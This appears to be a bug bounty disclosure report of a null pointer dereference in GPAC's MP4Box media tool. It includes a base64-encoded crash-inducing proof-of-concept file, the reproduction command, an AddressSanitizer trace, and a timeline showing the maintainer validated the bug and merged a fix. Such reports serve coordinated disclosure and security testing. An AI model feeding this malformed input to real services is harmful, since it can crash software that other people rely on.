Untrusted Pointer Dereference in gpac/gpac

Valid

Reported on

Mar 8th 2022


Description

Null Pointer Dereference in gpac

Proof of Concept

Version:

~/fuzzing/gpac/gpac/bin/gcc/MP4Box -version
MP4Box - GPAC version 2.1-DEV-rev15-g6c0f4ff03-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io

Please cite our work in your research:
        GPAC Filters: https://doi.org/10.1145/3339825.3394929
        GPAC: https://doi.org/10.1145/1291233.1291452

GPAC Configuration:
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D

System information Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

poc

base64 poc
Q0dDMAAA//RkRDIAAgAQBQA////oA9z///91sSMAwERYRB1MAABbRERERERERP//dQHoAwAAAUMA
AAFEdHIB3QD9AAAA7gBC3QABQwAAAUR0cmFrOwAAAUEBCwAAGELdAP0AAALuAEL4AAFDRERERERE
RP//dQHoAwAAAQwAAABBAX//6APm////dQGxIwDARFhEHUwAAFtERERERERE

command:

./MP4Box -info poc

Result

~/fuzzing/gpac/gpac/bin/gcc/MP4Box -info ./poc
[Core] exp-golomb read failed, not enough bits in bitstream !
[HEVC] Warning: Error parsing NAL unit
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1172475==ERROR: AddressSanitizer: SEGV on unknown address 0x00010000000d (pc 0x7f031b4ec838 bp 0x000000000002 sp 0x7ffca1f029b8 T0)
==1172475==The signal is caused by a READ memory access.
    #0 0x7f031b4ec837  (/lib/x86_64-linux-gnu/libasan.so.5+0x12e837)
    #1 0x7f031b4ec9d1  (/lib/x86_64-linux-gnu/libasan.so.5+0x12e9d1)
    #2 0x7f031b4ec60b  (/lib/x86_64-linux-gnu/libasan.so.5+0x12e60b)
    #3 0x7f031b3ea141  (/lib/x86_64-linux-gnu/libasan.so.5+0x2c141)
    #4 0x7f031b3e6e1f  (/lib/x86_64-linux-gnu/libasan.so.5+0x28e1f)
    #5 0x7f031b4cc0b1 in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10e0b1)
    #6 0x7f031abc5655 in gf_list_add (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0xac655)
    #7 0x7f031b0ca909 in naludmx_process (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x5b1909)
    #8 0x7f031afa67ef in gf_filter_process_task (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x48d7ef)
    #9 0x7f031af944d3 in gf_fs_thread_proc (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x47b4d3)
    #10 0x7f031af9943a in gf_fs_run (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x48043a)
    #11 0x7f031ae07151 in gf_media_import (/home/aidai/fuzzing/gpac/gpac/bin/gcc/libgpac.so.11+0x2ee151)
    #12 0x5613ea17fdc2 in convert_file_info (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x3ddc2)
    #13 0x5613ea16e6d2 in mp4boxMain (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x2c6d2)
    #14 0x7f031a94b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
    #15 0x5613ea15b53d in _start (/home/aidai/fuzzing/gpac/gpac/bin/gcc/MP4Box+0x1953d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libasan.so.5+0x12e837)
==1172475==ABORTING
We are processing your report and will contact the gpac team within 24 hours. 3 months ago
We have contacted a member of the gpac team and are waiting to hear back 3 months ago
We have sent a follow up to the gpac team. We will try again in 7 days. 3 months ago
We have sent a second follow up to the gpac team. We will try again in 10 days. 2 months ago
gpac/gpac maintainer
2 months ago

Maintainer


https://github.com/gpac/gpac/issues/2149

gpac/gpac maintainer validated this vulnerability 2 months ago
aidaip has been awarded the disclosure bounty
The fix bounty is now up for grabs
gpac/gpac maintainer confirmed that a fix has been merged on fece80 2 months ago
The fix bounty has been dropped
to join this conversation